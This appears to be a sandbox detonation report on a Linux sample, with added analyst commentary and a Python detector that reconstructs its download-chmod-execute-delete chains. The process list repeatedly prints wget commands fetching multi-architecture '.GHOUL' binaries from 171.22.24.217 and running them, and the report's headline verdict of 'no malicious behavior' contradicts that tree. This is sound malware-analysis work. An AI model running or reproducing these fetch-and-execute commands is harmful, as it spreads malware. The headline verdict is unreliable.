Analysis Overview
SHA256
315c6dff5c2f03934edeeda81919c9558dcb124f1c985160e7d25fa3f01243b1
Threat Level: No (potentially) malicious behavior was detected
The file b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118 was found to be: No (potentially) malicious behavior was detected.
Malicious Activity Summary
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-06-17 04:29
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-06-17 04:29
Reported
2024-06-17 04:29
Platform
debian9-mipsbe-20240611-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-06-17 04:29
Reported
2024-06-17 04:29
Platform
debian9-mipsel-20240418-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-17 04:29
Reported
2024-06-17 04:32
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
3s
Max time network
128s
Command Line
Signatures
Processes
/tmp/b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118
[/tmp/b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118]
/usr/bin/wget
[wget http://171.22.24.217/m-i.p-s.GHOUL]
/bin/chmod
[chmod +x m-i.p-s.GHOUL]
/tmp/m-i.p-s.GHOUL
[./m-i.p-s.GHOUL]
/bin/rm
[rm -rf m-i.p-s.GHOUL]
/usr/bin/wget
[wget http://171.22.24.217/m-p.s-l.GHOUL]
/bin/chmod
[chmod +x m-p.s-l.GHOUL]
/tmp/m-p.s-l.GHOUL
[./m-p.s-l.GHOUL]
/bin/rm
[rm -rf m-p.s-l.GHOUL]
/usr/bin/wget
[wget http://171.22.24.217/s-h.4-.GHOUL]
/bin/chmod
[chmod +x s-h.4-.GHOUL]
/tmp/s-h.4-.GHOUL
[./s-h.4-.GHOUL]
/bin/rm
[rm -rf s-h.4-.GHOUL]
/usr/bin/wget
[wget http://171.22.24.217/x-8.6-.GHOUL]
/bin/chmod
[chmod +x x-8.6-.GHOUL]
/tmp/x-8.6-.GHOUL
[./x-8.6-.GHOUL]
/bin/rm
[rm -rf x-8.6-.GHOUL]
/usr/bin/wget
[wget http://171.22.24.217/a-r.m-6.GHOUL]
/bin/chmod
[chmod +x a-r.m-6.GHOUL]
/tmp/a-r.m-6.GHOUL
[./a-r.m-6.GHOUL]
/bin/rm
[rm -rf a-r.m-6.GHOUL]
/usr/bin/wget
[wget http://171.22.24.217/x-3.2-.GHOUL]
/bin/chmod
[chmod +x x-3.2-.GHOUL]
/tmp/x-3.2-.GHOUL
[./x-3.2-.GHOUL]
/bin/rm
[rm -rf x-3.2-.GHOUL]
/usr/bin/wget
[wget http://171.22.24.217/a-r.m-7.GHOUL]
/bin/chmod
[chmod +x a-r.m-7.GHOUL]
/tmp/a-r.m-7.GHOUL
[./a-r.m-7.GHOUL]
/bin/rm
[rm -rf a-r.m-7.GHOUL]
/usr/bin/wget
[wget http://171.22.24.217/p-p.c-.GHOUL]
/bin/chmod
[chmod +x p-p.c-.GHOUL]
/tmp/p-p.c-.GHOUL
[./p-p.c-.GHOUL]
/bin/rm
[rm -rf p-p.c-.GHOUL]
/usr/bin/wget
[wget http://171.22.24.217/i-5.8-6.GHOUL]
/bin/chmod
[chmod +x i-5.8-6.GHOUL]
/tmp/i-5.8-6.GHOUL
[./i-5.8-6.GHOUL]
/bin/rm
[rm -rf i-5.8-6.GHOUL]
/usr/bin/wget
[wget http://171.22.24.217/m-6.8-k.GHOUL]
/bin/chmod
[chmod +x m-6.8-k.GHOUL]
/tmp/m-6.8-k.GHOUL
[./m-6.8-k.GHOUL]
/bin/rm
[rm -rf m-6.8-k.GHOUL]
/usr/bin/wget
[wget http://171.22.24.217/p-p.c-.GHOUL]
/bin/chmod
[chmod +x p-p.c-.GHOUL]
/tmp/p-p.c-.GHOUL
[./p-p.c-.GHOUL]
/bin/rm
[rm -rf p-p.c-.GHOUL]
/usr/bin/wget
[wget http://171.22.24.217/a-r.m-4.GHOUL]
/bin/chmod
[chmod +x a-r.m-4.GHOUL]
/tmp/a-r.m-4.GHOUL
[./a-r.m-4.GHOUL]
/bin/rm
[rm -rf a-r.m-4.GHOUL]
/usr/bin/wget
[wget http://171.22.24.217/a-r.m-5.GHOUL]
/bin/chmod
[chmod +x a-r.m-5.GHOUL]
/tmp/a-r.m-5.GHOUL
[./a-r.m-5.GHOUL]
/bin/rm
[rm -rf a-r.m-5.GHOUL]
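The process list above records the same four-step loop thirteen times: wget fetches a file from 171.22.24.217, chmod +x makes it executable, it is run from /tmp, and rm -rf deletes it before the next fetch. Stripping the "-" and "." padding from each name spells out the target architecture (m-i.p-s is mips, x-8.6- is x86, a-r.m-7 is arm7, m-6.8-k is m68k, and so on), so the sample is a multi-architecture downloader stage and the verdict line at the top of this report reflects the sandbox's signature hits, not this process tree. As an added example that is not part of the report or of the sandbox's output, the following Python reconstructs those download-chmod-execute-delete chains from process entries and emits the indicators an analyst would pivot on. The "image|command line" input format, the trimmed subset of entries and the benign /bin/ls entry are constructed for the example; everything else in the sample is copied from the process list above.

```python
"""Reconstruct wget -> chmod +x -> execute -> rm chains from a sandbox process list."""
import re
from urllib.parse import urlparse

# Constructed sample input: a subset of the behavioral1 process list, one
# "<image>|<command line>" entry per line, plus one constructed benign entry
# (/bin/ls) that the detector must ignore. The duplicate p-p.c-.GHOUL fetch
# is in the original report and is kept to show that re-downloads are counted.
PROCESS_LINES = """\
/tmp/b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118|/tmp/b6c102d8d3cb13f9aa55c32b4d043966_JaffaCakes118
/usr/bin/wget|wget http://171.22.24.217/m-i.p-s.GHOUL
/bin/chmod|chmod +x m-i.p-s.GHOUL
/tmp/m-i.p-s.GHOUL|./m-i.p-s.GHOUL
/bin/rm|rm -rf m-i.p-s.GHOUL
/bin/ls|ls /tmp
/usr/bin/wget|wget http://171.22.24.217/x-8.6-.GHOUL
/bin/chmod|chmod +x x-8.6-.GHOUL
/tmp/x-8.6-.GHOUL|./x-8.6-.GHOUL
/bin/rm|rm -rf x-8.6-.GHOUL
/usr/bin/wget|wget http://171.22.24.217/p-p.c-.GHOUL
/bin/chmod|chmod +x p-p.c-.GHOUL
/tmp/p-p.c-.GHOUL|./p-p.c-.GHOUL
/bin/rm|rm -rf p-p.c-.GHOUL
/usr/bin/wget|wget http://171.22.24.217/p-p.c-.GHOUL
/bin/chmod|chmod +x p-p.c-.GHOUL
/tmp/p-p.c-.GHOUL|./p-p.c-.GHOUL
/bin/rm|rm -rf p-p.c-.GHOUL
/usr/bin/wget|wget http://171.22.24.217/a-r.m-5.GHOUL
/bin/chmod|chmod +x a-r.m-5.GHOUL
/tmp/a-r.m-5.GHOUL|./a-r.m-5.GHOUL
/bin/rm|rm -rf a-r.m-5.GHOUL
"""

# The stages must appear in this order for one filename to count as a chain.
STAGES = ("download", "chmod", "exec", "rm")


def arch_token(name):
    """Drop the .GHOUL suffix and the '-'/'.' padding: 'm-i.p-s.GHOUL' -> 'mips'."""
    stem = name.rsplit(".", 1)[0] if name.endswith(".GHOUL") else name
    return re.sub(r"[-.]", "", stem)


def classify(image, argv):
    """Map one process entry to (stage, target filename, url) or None if unrelated."""
    parts = argv.split()
    if image.endswith("/wget") and len(parts) >= 2 and parts[-1].startswith("http"):
        url = parts[-1]
        return "download", url.rsplit("/", 1)[-1], url
    if image.endswith("/chmod") and parts[:2] == ["chmod", "+x"] and len(parts) == 3:
        return "chmod", parts[2], None
    if image.startswith("/tmp/") and argv == "./" + image[len("/tmp/"):]:
        return "exec", image[len("/tmp/"):], None
    if image.endswith("/rm") and parts[:2] == ["rm", "-rf"] and len(parts) == 3:
        return "rm", parts[2], None
    return None


def extract_chains(text):
    """Return one record per completed download->chmod->exec->rm chain, in order seen."""
    pending = {}   # filename -> partially built chain
    chains = []
    for line in text.splitlines():
        if "|" not in line:
            continue
        image, argv = line.split("|", 1)
        hit = classify(image, argv)
        if hit is None:
            continue
        stage, name, url = hit
        if stage == "download":
            # A fresh download of the same name restarts its chain.
            pending[name] = {"name": name, "arch": arch_token(name), "url": url,
                             "host": urlparse(url).hostname, "stages": ["download"]}
            continue
        chain = pending.get(name)
        expected = STAGES[len(chain["stages"])] if chain else None
        if chain is None or stage != expected:
            continue   # out-of-order step or a file we never saw downloaded
        chain["stages"].append(stage)
        if stage == "rm":
            chains.append(pending.pop(name))
    return chains


def summarize(chains):
    """Collapse chains into the indicators an analyst would pivot on."""
    return {
        "chains": len(chains),
        "hosts": sorted({c["host"] for c in chains}),
        "urls": sorted({c["url"] for c in chains}),
        "archs": sorted({c["arch"] for c in chains}),
    }


if __name__ == "__main__":
    for key, value in summarize(extract_chains(PROCESS_LINES)).items():
        print(f"{key}: {value}")
```

Run against the full process list above, the same logic yields thirteen chains, twelve distinct URLs and a single host, which matches the thirteen tcp rows to 171.22.24.217:80 in the network table that follows. Matching on the exact argv shape (chmod +x with one operand, rm -rf with one operand, ./name executed from /tmp) keeps the detector from firing on ordinary package-manager or build activity that also calls wget and chmod.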
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| GB | 185.125.188.61:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| GB | 195.181.164.19:443 | | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-17 04:29
Reported
2024-06-17 04:32
Platform
debian9-armhf-20240611-en
Max time network
18s
Command Line
Signatures
Processes
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |
| IR | 171.22.24.217:80 | 171.22.24.217 | tcp |